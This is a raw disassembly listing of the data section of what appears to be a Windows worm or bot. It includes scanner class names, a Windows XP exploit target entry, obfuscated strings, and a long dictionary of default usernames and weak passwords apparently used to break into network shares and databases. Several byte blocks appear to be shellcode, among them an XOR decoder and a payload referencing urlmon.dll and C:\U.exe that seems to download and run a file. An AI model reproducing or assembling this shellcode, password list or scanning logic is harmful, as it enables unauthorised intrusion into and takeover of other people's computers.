dd 0F3D4A7EBh, 4AE1EBF7h, 45CF957Ah, 91C7CC65h, 0A0AEA60Eh
dd 46A3E319h, 0C17650Dh, 75868175h, 4D48C976h, 0A7E44258h
dd 353B3993h, 53EDB2B8h, 5DE5A74Dh, 3B5DC53Dh, 5A929E8Bh
dd 0F0A65DFFh, 54C020A1h, 61378CA5h, 5A8BFDD1h, 5D25D88Bh
dd 67DBF989h, 0F3F895AAh, 0C8A2BF27h, 6E80DD5Dh, 979BC94Ch
dd 52028A20h, 7525C460h, 0
dword_4243C0 dd 0CCCDCCCDh, 0CCCCCCCCh, 3FFBCCCCh, 0D70A3D71h, 0A3D70A3h
; DATA XREF: sub_4123ED+37A�o
; sub_412AB1+1B3�o
dd 3FF8A3D7h, 0DF3B645Ah, 6E978D4Fh, 3FF58312h, 652CD3C3h
dd 1758E219h, 3FF1D1B7h, 84230FD0h, 0AC471B47h, 3FEEA7C5h
dd 69B6A640h, 0BD05AF6Ch, 3FEB8637h, 42BC3D33h, 94D5E57Ah
dd 3FE7D6BFh, 0CEFDFDC2h, 77118461h, 3FE4ABCCh, 0E15B4C2Fh
dd 94BEC44Dh, 3FC9E695h, 3B53C492h, 14CD4475h, 3FAF9ABEh
dd 94BA67DEh, 1EAD4539h, 3F94CFB1h, 0E2C62324h, 313BBABCh
dd 3F7A8B61h, 0C1595561h, 7C53B17Eh, 3F5FBB12h, 8D2FEED7h
dd 8592BE06h, 3F44FB15h, 0E9A53F24h, 0EA27A539h, 3F2AA87Fh
dd 0E4A1AC7Dh, 467C64BCh, 3E55DDD0h, 0CC067B63h, 83775423h
dd 3D8191FFh, 193AFA91h, 4325637Ah, 3CACC031h, 38D18921h
dd 0B8974782h, 3BD7FD00h, 85888DCh, 0E3E8B11Bh, 3B03A686h
dd 424584C6h, 7599B607h, 3A2EDB37h, 0D21C7133h, 0EE32DB23h
dd 395A9049h, 0C0BE87A6h, 82A5DA57h, 32B5A2A6h, 11B268E2h
dd 449F52A7h, 2C10B759h, 2DE44925h, 534F3436h, 256BCEAEh
dd 0A404598Fh, 7DC2DEC0h, 1EC6E8FBh, 5A88E79Eh, 0BF3C9157h
dd 18228350h, 62654B4Eh, 0AF8F83FDh, 117D9406h, 9FDE2DE4h
dd 4C8D2CEh, 0AD8A6DDh, 0
dd offset aBadAllocation ; "bad allocation"
dd offset dword_41EF18
dword_424528 dd 4Eh ; DATA XREF: sub_401F1C+C8�r
; sub_40251A+57�r ...
dd 7 dup(0)
dword_424548 dd 8Bh ; DATA XREF: sub_401F1C+3FE�r
; sub_40251A+77�r ...
dword_42454C dd 0 ; DATA XREF: sub_40251A:loc_40256B�r
; sub_41A8D5+E8�r ...
off_424550 dd offset sub_41A9DE ; DATA XREF: seg000:00413C39�r
; seg000:00413D4A�r ...
dd 4Dh, 7 dup(0)
dd 599h, 0
dd offset sub_41B1A0
dd 53h, 7 dup(0)
dd 0B97h, 0
dd offset sub_41A8D5
dd 0Bh dup(0)
dd offset aBadAllocatio_0 ; "bad allocation"
dword_4245DC dd 200F1001h, 0Ah, 1001802h, 0 ; DATA XREF: sub_41A5C1+205�o
dd 14002400h, 0D9D2C9B7h, 34EF333Eh, 431F25h, 2F5C0202h
dd 0
dword_424604 dd 6EB4141h, 501E100Dh, 6D6Dh, 41EF94h ; DATA XREF: sub_41A5C1+2B4�o
dword_424614 dd 5C0D0A00h, 2E2F5Fh ; DATA XREF: sub_41A9DE+4A3�o
dword_42461C dd 0EFFFC481h, 44FFFFh, 41EFA4h ; DATA XREF: sub_41A9DE+321�o
dword_424628 dd 42Ah ; DATA XREF: sub_41A9DE+2CB�r
dword_42462C dd 3E8h ; DATA XREF: sub_41A9DE+4ED�r
dword_424630 dd 258h ; DATA XREF: sub_41A9DE+318�r
dd offset aWindowsXpSp0Sp ; "Windows XP (SP0+SP1)"
dd 2C6h, 264h, 0
dword_424644 dd 20804h ; DATA XREF: sub_41A9DE+506�r
; sub_41A9DE+512�r ...
dd offset aBadAllocatio_2 ; "bad allocation"
dd offset aBadAllocatio_3 ; "bad allocation"
off_424650 dd offset byte_41EF0B ; DATA XREF: sub_41B1A0:loc_41B27D�r
; sub_41B1A0+EE�o
dd offset aAdministrator ; "administrator"
dd offset aAdministrador ; "administrador"
dd offset aAdministrateur ; "administrateur"
dd offset aAdministrat ; "administrat"
dd offset aAdmins ; "admins"
dd offset aAdmin_0 ; "admin"
dd offset aAdm ; "adm"
dd offset aPassword1 ; "password1"
dd offset aPassword ; "password"
dd offset aPasswd ; "passwd"
dd offset aPass1234 ; "pass1234"
dd offset aPass ; "pass"
dd offset aPwd ; "pwd"
dd offset a007 ; "007"
dd offset a1 ; "1"
dd offset a12 ; "12"
dd offset a123 ; "123"
dd offset a1234 ; "1234"
dd offset a12345 ; "12345"
dd offset a123456 ; "123456"
dd offset a1234567 ; "1234567"
dd offset a12345678 ; "12345678"
dd offset a123456789 ; "123456789"
dd offset a1234567890 ; "1234567890"
dd offset a2000 ; "2000"
dd offset a2001 ; "2001"
dd offset a2002 ; "2002"
dd offset a2003 ; "2003"
dd offset a2004 ; "2004"
dd offset aTest ; "test"
dd offset aGuest ; "guest"
dd offset aNone ; "none"
dd offset aDemo ; "demo"
dd offset aUnix ; "unix"
dd offset aLinux ; "linux"
dd offset aChangeme ; "changeme"
dd offset aDefault ; "default"
dd offset aSystem_0 ; "system"
dd offset aServer ; "server"
dd offset aRoot_0 ; "root"
dd offset aNull_1 ; "null"
dd offset aQwerty ; "qwerty"
dd offset aMail ; "mail"
dd offset aOutlook ; "outlook"
dd offset aWeb ; "web"
dd offset aWww ; "www"
dd offset aInternet ; "internet"
dd offset aAccounts ; "accounts"
dd offset aAccounting ; "accounting"
dd offset aHome ; "home"
dd offset aHomeuser ; "homeuser"
dd offset aUser ; "user"
dd offset aOem ; "oem"
dd offset aOemuser ; "oemuser"
dd offset aOeminstall ; "oeminstall"
dd offset aWindows ; "windows"
dd offset aWin98 ; "win98"
dd offset aWin2k ; "win2k"
dd offset aWinxp ; "winxp"
dd offset aWinnt ; "winnt"
dd offset aWin2000 ; "win2000"
dd offset aQaz ; "qaz"
dd offset aAsd ; "asd"
dd offset aZxc ; "zxc"
dd offset aQwe ; "qwe"
dd offset aBob ; "bob"
dd offset aJen ; "jen"
dd offset aJoe ; "joe"
dd offset aFred ; "fred"
dd offset aBill ; "bill"
dd offset aMike ; "mike"
dd offset aJohn ; "john"
dd offset aPeter ; "peter"
dd offset aLuke ; "luke"
dd offset aSam ; "sam"
dd offset aSue ; "sue"
dd offset aSusan ; "susan"
dd offset aPeter_0 ; "peter"
dd offset aBrian ; "brian"
dd offset aLee ; "lee"
dd offset aNeil ; "neil"
dd offset aIan ; "ian"
dd offset aChris ; "chris"
dd offset aEric ; "eric"
dd offset aGeorge ; "george"
dd offset aKate ; "kate"
dd offset aBob_0 ; "bob"
dd offset aKatie ; "katie"
dd offset aMary ; "mary"
dd offset aLogin ; "login"
dd offset aLoginpass ; "loginpass"
dd offset aTechnical ; "technical"
dd offset aBackup ; "backup"
dd offset aExchange ; "exchange"
dd offset aFuck ; "fuck"
dd offset aBitch ; "bitch"
dd offset aSlut ; "slut"
dd offset aSex ; "sex"
dd offset aGod ; "god"
dd offset aHell ; "hell"
dd offset aHello ; "hello"
dd offset aDomain ; "domain"
dd offset aDomainpass ; "domainpass"
dd offset aDomainpassword ; "domainpassword"
dd offset aDatabase ; "database"
dd offset aAccess ; "access"
dd offset aDbpass ; "dbpass"
dd offset aDbpassword ; "dbpassword"
dd offset aDatabasepass ; "databasepass"
dd offset aData ; "data"
dd offset aDatabasepasswo ; "databasepassword"
dd offset aDb1 ; "db1"
dd offset aDb2 ; "db2"
dd offset aDb1234 ; "db1234"
dd offset aSa_0 ; "sa"
dd offset aSql ; "sql"
dd offset aSqlpassoainsta ; "sqlpassoainstall"
dd offset aOrainstall ; "orainstall"
dd offset aOracle ; "oracle"
dd offset aIbm ; "ibm"
dd offset aCisco ; "cisco"
dd offset aDell ; "dell"
dd offset aCompaq ; "compaq"
dd offset aSiemens ; "siemens"
dd offset aHp ; "hp"
dd offset aNokia ; "nokia"
dd offset aXp ; "xp"
dd offset aControl ; "control"
dd offset aOffice ; "office"
dd offset aBlank ; "blank"
dd offset aWinpass ; "winpass"
dd offset aMain ; "main"
dd offset aLan ; "lan"
dd offset aInternet_0 ; "internet"
dd offset aIntranet ; "intranet"
dd offset aStudent ; "student"
dd offset aTeacher ; "teacher"
dd offset aStaff ; "staff"
align 10h
dd offset aBadAllocatio_4 ; "bad allocation"
dd offset aBadAllocatio_5 ; "bad allocation"
dd offset aBadAllocatio_6 ; "bad allocation"
dd offset aBadAllocatio_7 ; "bad allocation"
dd offset aBadAllocatio_8 ; "bad allocation"
dword_424894 dd 22B1C933h, 74D9EED9h, 805BF424h, 8000146Bh, 8300156Bh
; DATA XREF: sub_41411F+78�o
dd 0F3E2FEEBh, 0
dword_4248B0 dd 22B1C933h, 74D9EED9h, 805BF424h, 80001473h, 83001573h
; DATA XREF: sub_41411F+182�o
dd 0F3E2FEEBh, 2 dup(0)
dword_4248D0 dd 758B54EBh, 35748B3Ch, 56F50378h, 320768Bh, 49C933F5h
; DATA XREF: sub_41432A+38�o
dd 0DB33AD41h, 14BE0F36h, 74F23828h, 0DCBC108h, 0EB40DA03h
dd 75DF3BEFh, 5E8B5EE7h, 66DD0324h, 8B4B0C8Bh, 0DD031C5Eh
dd 38B048Bh, 7275C3C5h, 6E6F6D6Ch, 6C6C642Eh, 5C3A4300h
dd 78652E55h, 0C0330065h, 30400364h, 408B0C78h, 1C708B0Ch
dd 8408BADh, 408B09EBh, 7C408D34h, 953C408Bh, 0E4E8EBFh
dd 0FF84E8ECh, 0EC83FFFFh, 242C8304h, 95D0FF3Ch, 1A36BF50h
dd 6FE8702Fh, 8BFFFFFFh, 8DFC2454h, 0DB33BA52h, 0EB525353h
dd 0D0FF5324h, 0FE98BF5Dh, 53E80E8Ah, 83FFFFFFh, 2C8304ECh
dd 0D0FF6224h, 0E0CEEFBFh, 0FF40E860h, 0FF52FFFFh, 0FFD7E8D0h
dd 0FFFFh, 0
dd 0FF000000h, 0FFFF0000h, 0FFFFFF00h, 80000000h, 800000h
dd 8000h, 80h, 4200D0h
dword_4249C0 dd 0 ; DATA XREF: sub_416AE0+6E�r
dword_4249C4 dd 0 ; DATA XREF: sub_416AE0+75�r
dd 0
dd 0FF000000h, 0
dd 0FFFF0000h, 0
dd 0FFFFFF00h, 0
dd 0FFFFFFFFh, 0FF000000h, 0FFFFFFFFh, 0FFFF0000h, 0FFFFFFFFh
dd 0FFFFFF00h, 0FFFFFFFFh
dword_424A00 dd 0 ; DATA XREF: sub_416AE0+8B�r
dword_424A04 dd 80000000h ; DATA XREF: sub_416AE0+91�r
dd 0
dd 800000h, 0
dd 8000h, 0
dd 80h, 80000000h, 0
dd 800000h, 0
dd 8000h, 0
dd 80h, 0
dd offset dword_4200D0+10h
dd offset aBadAllocatio_9 ; "bad allocation"
dword_424A48 dd 0BBEDEDF4h, 0E1F0FBFCh, 0FBBBF6E5h, 0E1F0h, 7Ch dup(0)
; DATA XREF: seg000:0041C020�o
dword_424C48 dd 0E5F4A6E7h, 0E7A6h, 7Eh dup(0) ; DATA XREF: seg000:0041C01B�o
word_424E48 dw 1D45h ; DATA XREF: seg000:loc_41C013�r
align 10h
aHjdxzopvuvmrjf db 'hJdXZOPvUVmRJfVS',0 ; DATA XREF: sub_4196D1:loc_4196FC�o
; sub_4196D1+44�r
align 4
dd 1Bh dup(0)
dword_424ED0 dd 0EDF4B6B6h, 0EDh, 3Eh dup(0) ; DATA XREF: sub_41783D+2A9�o
; sub_41783D+375�o ...
dword_424FD0 dd 0D5EDEDF4h, 0D5h, 4 dup(0) ; DATA XREF: sub_41783D+2FF�o
; sub_41783D+38F�o
byte_424FE8 db 2Eh ; DATA XREF: sub_417676+E4�r
byte_424FE9 db 0B8h, 0EDh, 0 ; DATA XREF: sub_41783D+3A5�o
dd 0Dh dup(0)
db 0
byte_425021 db 0BFh, 0D5h, 0F4h ; DATA XREF: sub_41783D+611�o
dd 0FBBBEDEDh, 0E1F0h, 0Dh dup(0)
db 0
byte_425061 db 0EFh, 0F8h, 0FAh ; DATA XREF: sub_401C1D+60�o
; sub_416F86+B8�o ...
dd 0EDF0BBFBh, 0F0h, 1Dh dup(0)
db 0
byte_4250E1 db 0CFh, 0F8h, 0A5h ; DATA XREF: seg000:0041BEC5�o
dd 0FBh, 0Ch dup(0)
db 0
byte_425119 db 0CFh, 2 dup(0) ; DATA XREF: sub_416F86+A4�o
; sub_417119+7C�o ...
dd 40h dup(0)
dword_42521C dd 8 ; DATA XREF: sub_41748B+174�r
; sub_41748B+1B1�r
db 78h, 0Ch
byte_425222 db 1 ; DATA XREF: sub_40177B+8F�r
; sub_4019F3+8F�r
align 4
dd offset aBadAllocati_10 ; "bad allocation"
aGdbdADjmGjZJJN db 'У¤¡¤ÓÑ ×ÐÓ¤¦¬Ñ£¦Ó§Ô¦Ð¦ÐÑÑÐÑÖÐÑ ÐѦ§£¤Ö¤Ô¤ÐÔÓÑЧ¤¢§¥ ££ÑÖÐצӥ'
db 'Ö¢Ó¬£ÔÖ¡¤£¢¥¡Ô¡Ó¡×Ѭ¬Ó¬¤Ó§£ÖÓЦ§Ð×£¤¢¡¦§ צ¢×פ¡Ð×Ô ÔÖ',0
align 4
dd 70h dup(0)
aNbEdGzDdnbgNdZ db '¡×¥¤Ð£§Ñ¤¤¡£Ð¤Ð§ÑÑ£¬¤Ó×ÖЬ ¢¢×¦ ÐЦ¬¬¤¡Ð ¬Ô¤Ð£××¢¢¡×£¢§§Ó£¬'
; DATA XREF: sub_4019F3+7C�o
db 'У¬¢¢Ô¡¬§Ó¤Ñ¡¦¥¡¢ÑÓ¤¢¡ÖÐ׬Ԭ ÐÔ¡¦Ö×£¡§ §££¢£××Ч¢×ÑÖ Ð¦Ð ',0
align 4
dd 10h dup(0)
dword_425528 dd 0DED6DCDBh, 0 ; DATA XREF: sub_41802F+216�o
; sub_41829C+27�o
db 0
byte_425531 db 0C5h, 0D4h, 0C6h ; DATA XREF: sub_41802F+13E�o
dd 0C6h
db 2 dup(0)
word_42553A dw 0C6C0h ; DATA XREF: sub_41802F+227�o
dd 0C7D0h
db 3 dup(0)
byte_425543 db 0C5h ; DATA XREF: sub_41783D+1CF�o
dd 0D2DBDCh, 0
dword_42554C dd 0D2DBDAC5h, 0 ; DATA XREF: sub_41783D+22F�o
db 0
byte_425555 db 0DEh, 0DCh, 0D6h ; DATA XREF: sub_41783D+1DF�o
dd 0DEh
db 2 dup(0)
word_42555E dw 0DADFh ; DATA XREF: sub_41783D+2EC�o
; sub_41783D+355�o
dd 0DBDCh
db 3 dup(0)
byte_425567 db 0D8h ; DATA XREF: sub_41783D+365�o
dd 0D0D1DAh, 0
dword_425570 dd 0C3DCC7C5h, 0D2C6D8h, 2 dup(0) ; DATA XREF: sub_417361+A4�o
; sub_41783D+1EF�o
dword_425580 dd 0E5E1E1FDh, 0E2BABAAFh, 0F1BBE2E2h, 0F0FEFBF0h, 0F0E3FAFBh
; DATA XREF: sub_41A5C1+123�o
; sub_41A9DE+408�o
dd 0FBF0F1E7h, 0BBFBF0FEh, 0E2BAF9FBh, 0FAF9F7F0h, 0F8FCBAF2h
dd 0E6F0F2F4h, 0FAF8EFBAh, 0EDF0BBFBh, 0F0h, 420350h
dword_4255BC dd 5348h, 4204B8h, 4204D4h, 4206C8h, 4206D8h, 42070Ch
; DATA XREF: sub_418C40+20�o
; sub_418C40+8E�o
dd 42071Ch, 420734h
dword_4255DC dd 80000002h, 80000001h, 420A4Ch ; DATA XREF: sub_419A9F+6B�o
dword_4255E8 dd 0CA975201h, 0A811D059h, 0D5h, 1Dh dup(0) ; DATA XREF: sub_4198D2+3D�o
dd 9, 0C5C1371Dh, 6379AB46h, 8Fh, 1Dh dup(0)
dd 9, 7D8AAFA8h, 0F4BE11C9h, 8, 1Dh dup(0)
dd 9, 9F499642h, 0F537FD4Ah, 0D6h, 1Dh dup(0)
dd 9, 123485E9h, 411291D9h, 12h, 1Dh dup(0)
dd 9, 5EB02EBh, 0FFFFF9E8h, 0FFh, 1Dh dup(0)
dd 9
off_425900 dd offset off_41D38C ; DATA XREF: seg001:00420E8C�o
; seg001:00420EAC�o
align 8
a_?avclsmodule@ db '.?AVclsModule@@',0
off_425918 dd offset off_41D38C ; DATA XREF: seg001:00420ED4�o
; seg001:00420EFC�o ...
align 10h
a_?avlength_err db '.?AVlength_error@std@@',0
align 4
off_425938 dd offset off_41D38C ; DATA XREF: seg001:00420F24�o
; seg001:00420F48�o ...
align 10h
a_?avlogic_erro db '.?AVlogic_error@std@@',0
align 4
off_425958 dd offset off_41D38C ; DATA XREF: seg001:00420DE4�o
; seg001:00420F94�o ...
align 10h
a_?avexception@ db '.?AVexception@std@@',0
off_425974 dd offset off_41D38C ; DATA XREF: seg001:00420F70�o
; seg001:00420FC8�o ...
dd 0
a_?avbad_alloc@ db '.?AVbad_alloc@std@@',0
off_425990 dd offset off_41D38C ; DATA XREF: seg001:00420FF0�o
; seg001:00421014�o
align 8
dd 56413F2Eh, 556C646Dh, 40404450h, 0
off_4259A8 dd offset off_41D38C ; DATA XREF: seg001:0042103C�o
; seg001:00421060�o
align 10h
dd 56413F2Eh, 446C646Dh, 40404Ch
off_4259BC dd offset off_41D38C ; DATA XREF: seg001:00421088�o
; seg001:004210AC�o
dd 0
a_?avmdlhttpinf db '.?AVmdlHTTPInfo@@',0
align 4
off_4259D8 dd offset off_41D38C ; DATA XREF: seg001:004210D4�o
; seg001:004210F8�o
align 10h
a_?avmdlnetinfo db '.?AVmdlNetInfo@@',0
align 4
off_4259F4 dd offset off_41D38C ; DATA XREF: seg001:00421120�o
; seg001:00421144�o
dd 0
a_?avmdlsysinfo db '.?AVmdlSysInfo@@',0
align 10h
off_425A10 dd offset off_41D38C ; DATA XREF: seg001:0042116C�o
; seg001:00421190�o
align 8
a_?avmdlscansta db '.?AVmdlScanStats@@',0
align 4
off_425A2C dd offset off_41D38C ; DATA XREF: seg001:004211B8�o
; seg001:004211DC�o
dd 0
a_?avmdlscansto db '.?AVmdlScanStop@@',0
align 4
off_425A48 dd offset off_41D38C ; DATA XREF: seg001:00421204�o
; seg001:00421228�o
align 10h
a_?avmdlscanner db '.?AVmdlScanner@@',0
align 4
dd 7 dup(0)
dword_425A80 dd 0 ; DATA XREF: sub_402E33+4�w
; sub_402F39+3�r
dword_425A84 dd 0 ; DATA XREF: seg000:0041C52A�w
; seg000:0041C534�o
align 10h
dword_425A90 dd 0 ; DATA XREF: sub_40304B:loc_40306F�r
; sub_40304B+32�w
dword_425A94 dd 0 ; DATA XREF: seg000:00404055�w
; sub_40ABE1:loc_40ABF3�r ...
dd 0
dword_425A9C dd 0 ; DATA XREF: sub_403ED3�r
; sub_40F6C2+15�r ...
dword_425AA0 dd 0 ; DATA XREF: sub_40468E+8F�w
; seg001:off_41D3F8�o
dword_425AA4 dd 0 ; DATA XREF: sub_40468E+99�w
dd 0
dword_425AAC dd 0 ; DATA XREF: sub_40468E+8A�w
dd 10h dup(0)
dword_425AF0 dd 0 ; DATA XREF: sub_40468E+BF�w
; sub_40468E+DF�r
align 8
dword_425AF8 dd 0 ; DATA XREF: sub_40468E+7B�w
; seg001:0041D3FC�o
dd 22h dup(0)
word_425B84 dw 0 ; DATA XREF: sub_40468E+4F�w
align 4
word_425B88 dw 0 ; DATA XREF: sub_40468E+48�w
align 4
word_425B8C dw 0 ; DATA XREF: sub_40468E+41�w
align 10h
word_425B90 dw 0 ; DATA XREF: sub_40468E+3A�w
align 4
dword_425B94 dd 0 ; DATA XREF: sub_40468E+26�w
dword_425B98 dd 0 ; DATA XREF: sub_40468E+20�w
dword_425B9C dd 0 ; DATA XREF: sub_40468E+1A�w
dword_425BA0 dd 0 ; DATA XREF: sub_40468E+14�w
dword_425BA4 dd 0 ; DATA XREF: sub_40468E+E�w
dword_425BA8 dd 0 ; DATA XREF: sub_40468E+9�w
dword_425BAC dd 0 ; DATA XREF: sub_40468E+60�w
dword_425BB0 dd 0 ; DATA XREF: sub_40468E+68�w
; sub_40468E+85�r
word_425BB4 dw 0 ; DATA XREF: sub_40468E+33�w
align 4
dword_425BB8 dd 0 ; DATA XREF: sub_40468E+57�w
dword_425BBC dd 0 ; DATA XREF: sub_40468E+70�w
word_425BC0 dw 0 ; DATA XREF: sub_40468E+2C�w
align 4
dd 80h dup(0)
dword_425DC4 dd 0 ; DATA XREF: sub_404A44+15�w
; sub_404A44+1D�w ...
word_425DC8 dw 0 ; DATA XREF: sub_404C69+E7�w
align 4
dd 2 dup(0)
dword_425DD4 dd 0 ; DATA XREF: sub_404C69+C3�w
dword_425DD8 dd 0 ; DATA XREF: sub_404C69+CB�w
dword_425DDC dd 0 ; DATA XREF: sub_404C69+D3�w
dword_425DE0 dd 0 ; DATA XREF: sub_4028A9+6�r
; sub_4029E9+6�r ...
dd 8 dup(0)
dword_425E04 dd 0 ; DATA XREF: sub_4054D6+30�w
; sub_4054D6+51�r ...
dword_425E08 dd 0 ; DATA XREF: sub_4051FF+10�r
; sub_4054D6+3D�w ...
dword_425E0C dd 0 ; DATA XREF: sub_40531A+44�r
; sub_4054D6+4A�w ...
dword_425E10 dd 0 ; DATA XREF: sub_405229+B�r
; sub_4054D6+5E�w ...
align 8
dword_425E18 dd 54h dup(0) ; DATA XREF: sub_405881+4�o
dword_425F68 dd 0 ; DATA XREF: sub_402A45+7C�r
; sub_403603+62�r ...
dword_425F6C dd 0 ; DATA XREF: sub_405ADD+21�w
; sub_405B50+21C�r ...
dword_425F70 dd 0 ; DATA XREF: sub_40773A+14�r
; sub_40773A+29�r ...
dword_425F74 dd 0 ; DATA XREF: sub_40E072+19E�r
dword_425F78 dd 0 ; DATA XREF: seg000:00403FE0�w
; sub_407906:loc_40792E�r ...
dword_425F7C dd 0 ; DATA XREF: seg000:00403FF7�w
dword_425F80 dd 0 ; DATA XREF: seg000:00403FE6�w
dword_425F84 dd 0 ; DATA XREF: seg000:00403FEB�w
; sub_40793D+30�r
dword_425F88 dd 0 ; DATA XREF: seg000:00403FF1�w
dword_425F8C dd 0 ; DATA XREF: sub_40AE54+A2�w
dword_425F90 dd 0 ; DATA XREF: sub_40AE54+A7�w
align 8
dword_425F98 dd 0 ; DATA XREF: sub_40ABE1+4B�w
; sub_40ABE1:loc_40ACA6�r ...
dd 3 dup(0)
dword_425FA8 dd 0 ; DATA XREF: sub_40AE54+37�w
align 10h
byte_425FB0 db 0 ; DATA XREF: sub_407A0B+2C�w
; sub_40813B+5�r
align 4
dword_425FB4 dd 0 ; DATA XREF: sub_407A0B+23�w
dword_425FB8 dd 0 ; DATA XREF: sub_407A0B+1B�r
; sub_407A0B+A0�w
dword_425FBC dd 0 ; DATA XREF: sub_407F55+27�o
dword_425FC0 dd 0 ; DATA XREF: sub_407F55+22�r
dword_425FC4 dd 0 ; DATA XREF: sub_408058+4�w sub_408062�r
dword_425FC8 dd 0 ; DATA XREF: sub_4081FF+280�w
; sub_40871B:loc_408751�w ...
dd 3 dup(0)
dword_425FD8 dd 6 dup(0) ; DATA XREF: sub_409AB4+66�o
db 0
byte_425FF1 db 3 dup(0) ; DATA XREF: sub_409AB4+8A�o
dd 40h dup(0)
db 0
byte_4260F5 db 0 ; DATA XREF: sub_409AB4+92�w
align 4
dd 7Dh dup(0)
dword_4262EC dd 0 ; DATA XREF: sub_4036E0+80�r
; sub_409AB4+E3�o ...
dword_4262F0 dd 0 ; DATA XREF: sub_40A42B+8�r
align 8
dword_4262F8 dd 41h dup(0) ; DATA XREF: sub_40AE54+1D�o
byte_4263FC db 0 ; DATA XREF: sub_40AE54+24�w
align 10h
dword_426400 dd 0 ; DATA XREF: sub_40AF0D+2�r
; sub_40AF0D+24�w ...
dword_426404 dd 0 ; DATA XREF: sub_40B11E+43�r
; sub_40B18A+11�w ...
byte_426408 db 0 ; DATA XREF: sub_40B11E:loc_40B157�r
; sub_40B18A+17�w ...
align 4
dword_42640C dd 0 ; DATA XREF: sub_40BEA5+C�r
; sub_40BEDC+B�w
dword_426410 dd 0 ; DATA XREF: sub_40BF57+14�r
; sub_40BF57+3A�w ...
dword_426414 dd 0 ; DATA XREF: sub_40C33C+F�r
; sub_40C33C+37�w ...
dword_426418 dd 0 ; DATA XREF: seg002:off_423F3C�o
; seg002:off_423F40�o ...
dword_42641C dd 0 ; DATA XREF: sub_40CAFA+4�w
; sub_40CB14+11�r ...
dword_426420 dd 0 ; DATA XREF: sub_40D5BD+A�r
dword_426424 dd 0 ; DATA XREF: sub_40DCCF+4�w
; sub_40DD29:loc_40DD72�o ...
dword_426428 dd 0 ; DATA XREF: sub_40DCCF+9�w
; sub_40DD29:loc_40DDC8�o ...
dword_42642C dd 0 ; DATA XREF: sub_40DCCF+E�w sub_40DD1C�r ...
dword_426430 dd 0 ; DATA XREF: sub_40DCCF+13�w
; sub_40DD29:loc_40DDD4�o ...
align 8
dword_426438 dd 0 ; DATA XREF: sub_40DED9+4�w
dd 2 dup(0)
dword_426444 dd 0 ; DATA XREF: sub_40DEE3+4�w
dd 0Fh dup(0)
dword_426484 dd 0 ; DATA XREF: sub_4081FF+6�r
dword_426488 dd 0 ; DATA XREF: sub_40F524+10�r
; sub_40F524+60�w ...
dword_42648C dd 0 ; DATA XREF: sub_40F524+75�w
; sub_40F524:loc_40F672�r
dword_426490 dd 0 ; DATA XREF: sub_40F524+82�w
; sub_40F524+167�r
dword_426494 dd 0 ; DATA XREF: sub_40F524+D0�w
; sub_40F524:loc_40F5F9�r
dword_426498 dd 0 ; DATA XREF: sub_40F524+BA�w
; sub_40F524+E1�r ...
align 10h
dword_4264A0 dd 0 ; DATA XREF: sub_40F76B+F�w
dd 2Fh dup(0)
dword_426560 dd 0 ; DATA XREF: sub_410889:loc_4108B1�r
byte_426564 db 0 ; DATA XREF: sub_410A54:loc_410B90�r
align 4
dword_426568 dd 0 ; DATA XREF: sub_419A10+4B�r
; sub_419EA0+E6�w ...
dword_42656C dd 0 ; DATA XREF: sub_419948+14�r
; sub_4199AC+14�r ...
dword_426570 dd 0 ; DATA XREF: sub_4198D2+1D�r
; sub_419EA0+136�w ...
dword_426574 dd 0 ; DATA XREF: sub_419A10+1C�r
; sub_419EA0+AA�w ...
dword_426578 dd 0 ; DATA XREF: sub_419EA0+BE�w
; sub_419EA0+16D�r ...
dword_42657C dd 0 ; DATA XREF: sub_419EA0+D2�w
; sub_419EA0+179�r ...
dword_426580 dd 0 ; DATA XREF: sub_419948+34�r
; sub_4199AC+34�r ...
dword_426584 dd 0 ; DATA XREF: sub_419A10+63�r
; sub_419EA0+FA�w ...
dword_426588 dd 0 ; DATA XREF: sub_419EA0+14A�w
; sub_419EA0+322�r
dword_42658C dd 0 ; DATA XREF: sub_419EA0+96�w
; sub_419EA0+155�r ...
dword_426590 dd 0 ; DATA XREF: sub_419948+4D�r
; sub_4199AC+4D�r ...
dword_426594 dd 0 ; DATA XREF: sub_401C1D+6D�r
; sub_418B1F+A9�w ...
dword_426598 dd 0 ; DATA XREF: sub_401CC0+14F�r
; sub_41748B+11D�r ...
dword_42659C dd 0 ; DATA XREF: sub_401CC0+149�r
; sub_41748B+116�r ...
dword_4265A0 dd 0 ; DATA XREF: sub_401CC0+143�r
; sub_418DA0+61�w
dword_4265A4 dd 0 ; DATA XREF: sub_401CC0+13D�r
; sub_418DA0+66�w
dword_4265A8 dd 0 ; DATA XREF: sub_401CC0+137�r
; sub_418DA0+71�w
dword_4265AC dd 0 ; DATA XREF: sub_401CC0+12A�r
; sub_418DA0+76�w
dword_4265B0 dd 0 ; DATA XREF: sub_418D5A�r
; sub_418D5A:loc_418D8F�w ...
dword_4265B4 dd 0 ; DATA XREF: sub_418D5A+5�r
; sub_418D5A+3B�w ...
dword_4265B8 dd 0 ; DATA XREF: sub_418D5A+15�r
; sub_4192FB+20�w ...
dword_4265BC dd 0 ; DATA XREF: sub_4192FB+25�w
dd 33h dup(0)
dword_42668C dd 2 dup(0) ; DATA XREF: sub_4192FB+43�o
word_426694 dw 0 ; DATA XREF: sub_41835D+8�o
; sub_418B1F+AE�w ...
word_426696 dw 0 ; DATA XREF: sub_418B1F+D1�w
dword_426698 dd 0 ; DATA XREF: sub_418B1F+BD�w
dd 2 dup(0)
dword_4266A4 dd 0 ; DATA XREF: sub_418C40+6�r
; sub_418C40+73�r ...
dword_4266A8 dd 41h dup(0) ; DATA XREF: sub_418552+1ED�o
; sub_418552+224�o ...
dword_4267AC dd 0 ; DATA XREF: sub_41835D+D�r
; sub_418B1F+84�w ...
byte_4267B0 db 0 ; DATA XREF: sub_418552+293�o
; sub_418552+477�o ...
align 4
dd 40h dup(0)
byte_4268B4 db 0 ; DATA XREF: sub_401F1C:loc_401F83�r
; sub_418B1F+117�w ...
align 4
dword_4268B8 dd 41h dup(0) ; DATA XREF: sub_418552:loc_41876F�o
; sub_418B1F+1A�o
dword_4269BC dd 0 ; DATA XREF: sub_401C1D+47�r
; sub_401CC0+F4�r ...
byte_4269C0 db 0 ; DATA XREF: seg000:00413F6A�r
; sub_418301:loc_418331�r ...
align 4
dd 8 dup(0)
dword_4269E4 dd 0 ; DATA XREF: sub_41B5D2+33�w
; sub_41B5D2+8F�r ...
dword_4269E8 dd 40h dup(0) ; DATA XREF: sub_41B3D0+49�o
; sub_41B775+21�o
byte_426AE8 db 0 ; DATA XREF: sub_41A391+D7�o
; sub_41A391+132�w ...
align 4
dd 3Fh dup(0)
dword_426BE8 dd 0 ; DATA XREF: sub_401CC0+170�r
; sub_41A391+45�o
